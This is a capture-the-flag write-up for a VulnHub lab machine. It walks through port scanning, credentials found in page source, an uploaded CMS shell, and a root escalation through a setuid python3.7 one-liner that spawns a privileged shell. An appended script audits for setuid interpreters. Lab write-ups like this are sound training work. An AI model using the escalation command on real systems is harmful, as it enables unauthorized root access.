This is another easy-level machine from VulnHub.
Goal: Get the root flag of the target.
Difficulty: Easy/Medium Level
Lab Setup:-
Download this machine from the link and import it into VirtualBox.
Now let's find the IP of the machine.
My machine's IP is 192.168.1.205.
Scanning:-
┌──(danial㉿kali)-[~/Desktop/InfosecWarrior/Its_October]
└─$ nmap -sV -sC -v -A -oA nmap -p- 192.168.1.205
The scan found 4 open ports: 22, 80, 3306 and 8080.
Let's move forward with port 80.
Nothing special here, just a simple HTML template. Running dirb and gobuster found only an admin directory.
Leave it for now and move forward with port 8080.
This shows a custom page. Reviewing the source code revealed some creds.
Now let's log in to the CMS.
Now it's time to upload a shell.
After spending 2–3 hours I found a method to upload a shell. I also tried the plugin method, but it did not work.
Now we have a shell.
After running the find command, something caught my attention.
So I decided to move forward with python3.7.
So finally I had a method to root the machine.
bash-5.0$ /usr/bin/python3.7 -c 'import os; os.execl("/bin/sh", "sh", "-p")'
/usr/bin/python3.7 -c 'import os; os.execl("/bin/sh", "sh", "-p")'
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
# whoami
whoami
root
# cd /root
cd /root
# ls
ls
proof.txt
# cat proof.txt
cat proof.txt
Best of Luck
$2y$12$EUztpmoFH8LjEzUBVyNKw.9AKf37uZWPxJp.A3eop2ff0LbLYZrFq
Finally got root!!
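A defender-side check for the misconfiguration used above, as an added example that is not part of the original write-up: it walks a directory tree and flags setuid files whose name looks like a script interpreter or shell. The function names, the name pattern and the sample files are assumptions made for this example; that python3.7 carried the setuid bit is inferred from the euid=0 in the id output.

```python
import os
import re
import stat
import sys
import tempfile

# Assumed name pattern for binaries that can hand out a shell when setuid;
# it is illustrative, not an exhaustive list.
INTERPRETER_RE = re.compile(
    r"^(python|perl|ruby|php|lua|node|bash|dash|zsh|sh)[\d.]*$"
)


def audit_setuid(root):
    """Return (path, owner_uid, risk) for each setuid regular file under root."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root, followlinks=False):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # entry vanished or is unreadable
            if not stat.S_ISREG(st.st_mode) or not st.st_mode & stat.S_ISUID:
                continue
            risk = "high" if INTERPRETER_RE.match(name) else "review"
            findings.append((path, st.st_uid, risk))
    return sorted(findings)


def build_sample_tree():
    """Constructed sample: a setuid interpreter, a setuid tool, a plain file."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    for name, mode in (("python3.7", 0o4755), ("passwd", 0o4755), ("ls", 0o755)):
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write("placeholder\n")
        os.chmod(path, mode)  # set the mode after writing; a write clears setuid
    return root


if __name__ == "__main__":
    # With no argument the audit runs over the constructed sample tree.
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_tree()
    for path, uid, risk in audit_setuid(target):
        print(f"{risk:6} uid={uid} {path}")
```

On a real host, run it as root against / and compare the output with the setuid files the distribution ships; an interpreter reported as high should have the bit removed.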
Happy Hacking.